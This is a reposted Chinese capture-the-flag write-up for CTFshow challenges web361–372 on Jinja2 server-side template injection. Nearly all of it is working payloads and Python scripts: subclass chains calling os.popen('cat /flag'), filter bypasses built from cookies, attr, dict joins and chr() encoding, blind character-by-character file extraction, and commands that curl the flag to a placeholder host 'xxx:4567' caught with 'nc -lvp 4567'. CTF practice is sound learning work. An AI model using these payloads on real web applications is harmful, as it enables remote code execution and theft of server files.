CTFSHOW SSTI篇
文章目录
建议大家先看下笔者之前写的 模板注入的文章
web361
payload
name={
{().__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
web362
payload
?name={
{x.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
web363
payload
?name={
{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()
web364
payload
?name={
{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}
cookie传值
Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()
web365
payload
?name={
{x.__init__.__globals__.__getitem__(request.cookies.x1).eval(request.cookies.x2)}}
cookie传值
Cookie:x1=__builtins__;x2=__import__('os').popen('cat /flag').read()
web366、367
palyoad
?name={
{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
cookie传值
Cookie:x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()
web368
简单解法
import requests
import string
url ='http://826c9e0c-29d3-44de-9689-9f94eec68f1b.chall.ctf.show/?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%print(aaa.open(request.cookies.x5).read())%}'
headers={
'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=/flag'''}
r=requests.get(url,headers=headers)
print(r.text)复杂解法(盲注) payload
import requests
import string
url ='http://85302b44-c999-432c-8891-7ebdf703d6c0.chall.ctf.show/?name={%set aaa=(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4)%}{%if aaa.eval(request.cookies.x5)==request.cookies.x6%}1341{%endif%}'
s=string.digits+string.ascii_lowercase+"{-}"
flag=''
for i in range(1,43):
print(i)
for j in s:
x=flag+j
headers={
'Cookie':'''x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=open('/flag').read({0});x6={1}'''.format(i,x)}
r=requests.get(url,headers=headers)
#print(r.text)
if("1341" in r.text):
flag=x
print(flag)
breakweb369
简单解法
http://ec6b99bb-953a-4e28-8962-084bda49c739.chall.ctf.show/
?name=
{
% set po=dict(po=a,p=a)|join%}
{
% set a=(()|select|string|list)|attr(po)(24)%}
{
% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{
% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{
% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{
% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{
% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{
% set chr=x.chr%}
{
% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{
%print(x.open(file).read())%}复杂解法 方法1、读文件盲注
import requests
import string
def ccchr(s):
t=''
for i in range(len(s)):
if i<len(s)-1:
t+='chr('+str(ord(s[i]))+')%2b'
else:
t+='chr('+str(ord(s[i]))+')'
return t
url ='''http://b134fd30-bddc-4302-8578-8005b96f73c2.chall.ctf.show/?name= {% set a=(()|select|string|list).pop(24)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set cmd=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%} {% set cmd2='''
s=string.digits+string.ascii_lowercase+'{_-}'
flag=''
for i in range(1,50):
print(i)
for j in s:
x=flag+j
u=url+ccchr(x)+'%}'+'{% if x.open(cmd).read('+str(i)+')==cmd2%}'+'1341'+'{% endif%}'
#print(u)
r=requests.get(u)
if("1341" in r.text):
flag=x
print(flag)
break方法2、反弹flag 电脑开启监听 nc -lvp 4567
http://da9612ac-2b66-485d-8149-b76a1f03d22c.chall.ctf.show/?name=
{
% set a=(()|select|string|list).pop(24)%}
{
% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{
% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{
% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{
% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{
% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{
% set chr=x.chr%}
{
% set cmd=
%}
{
%if x.eval(cmd)%}
123
{
%endif%}cmd后面的值用脚本生成
s='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def ccchr(s):
t=''
for i in range(len(s)):
if i<len(s)-1:
t+='chr('+str(ord(s[i]))+')%2b'
else:
t+='chr('+str(ord(s[i]))+')'
return tweb370
简单的解法
http://bb03c844-9e63-4ee0-8659-fd30a88c63ff.chall.ctf.show/
?name=
{
% set c=(dict(e=a)|join|count)%}
{
% set cc=(dict(ee=a)|join|count)%}
{
% set ccc=(dict(eee=a)|join|count)%}
{
% set cccc=(dict(eeee=a)|join|count)%}
{
% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{
% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{
% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{
% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{
% set coun=(cc~cccc)|int%}
{
% set po=dict(po=a,p=a)|join%}
{
% set a=(()|select|string|list)|attr(po)(coun)%}
{
% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{
% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{
% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{
% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{
% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{
% set chr=x.chr%}
{
% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{
%print(x.open(file).read())%}暴躁的解法 payload
import requests
cmd='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def fun1(s):
t=[]
for i in range(len(s)):
t.append(ord(s[i]))
k=''
t=list(set(t))
for i in t:
k+='{% set '+'e'*(t.index(i)+1)+'=dict('+'e'*i+'=a)|join|count%}\n'
return k
def fun2(s):
t=[]
for i in range(len(s)):
t.append(ord(s[i]))
t=list(set(t))
k=''
for i in range(len(s)):
if i<len(s)-1:
k+='chr('+'e'*(t.index(ord(s[i]))+1)+')%2b'
else:
k+='chr('+'e'*(t.index(ord(s[i]))+1)+')'
return k
url ='http://68f8cbd4-f452-4d69-b382-81eafed22f3f.chall.ctf.show/?name='+fun1(cmd)+''' {% set coun=dict(eeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%} {% set po=dict(po=a,p=a)|join%} {% set a=(()|select|string|list)|attr(po)(coun)%} {% set ini=(a,a,dict(init=a)|join,a,a)|join()%} {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%} {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%} {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%} {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%} {% set chr=x.chr%} {% set cmd='''+fun2(cmd)+''' %} {%if x.eval(cmd)%} abc {%endif%} '''
print(url)开启监听 nc -lvp 4567 等待反弹flag
web371
过滤了print
http://c8f74fd3-a05a-477c-bb97-10325b9ce77d.chall.ctf.show?name=
{
% set c=(t|count)%}
{
% set cc=(dict(e=a)|join|count)%}
{
% set ccc=(dict(ee=a)|join|count)%}
{
% set cccc=(dict(eee=a)|join|count)%}
{
% set ccccc=(dict(eeee=a)|join|count)%}
{
% set cccccc=(dict(eeeee=a)|join|count)%}
{
% set ccccccc=(dict(eeeeee=a)|join|count)%}
{
% set cccccccc=(dict(eeeeeee=a)|join|count)%}
{
% set ccccccccc=(dict(eeeeeeee=a)|join|count)%}
{
% set cccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{
% set ccccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{
% set cccccccccccc=(dict(eeeeeeeeeee=a)|join|count)%}
{
% set coun=(ccc~ccccc)|int%}
{
% set po=dict(po=a,p=a)|join%}
{
% set a=(()|select|string|list)|attr(po)(coun)%}
{
% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{
% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{
% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{
% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{
% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{
% set chr=x.chr%}
{
% set cmd=
%}
{
%if x.eval(cmd)%}
abc
{
%endif%}cmd后面的内容由下面的代码生成
def aaa(t):
t='('+(int(t[:-1:])+1)*'c'+'~'+(int(t[-1])+1)*'c'+')|int'
return t
s='__import__("os").popen("curl http://xxx:4567?p=`cat /flag`").read()'
def ccchr(s):
t=''
for i in range(len(s)):
if i<len(s)-1:
t+='chr('+aaa(str(ord(s[i])))+')%2b'
else:
t+='chr('+aaa(str(ord(s[i])))+')'
return t
print(ccchr(s))web372
过滤了count,可以用length替换
跟大佬交换了思路学到了可以用全角数字代替正常数字,大家可以自行探索了。。。。。。
半角转全角代码
def half2full(half):
full = ''
for ch in half:
if ord(ch) in range(33, 127):
ch = chr(ord(ch) + 0xfee0)
elif ord(ch) == 32:
ch = chr(0x3000)
else:
pass
full += ch
return full
t=''
s="0123456789"
for i in s:
t+='\''+half2full(i)+'\','
print(t)版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/180160.html原文链接:https://javaforall.cn
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年10月19日,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
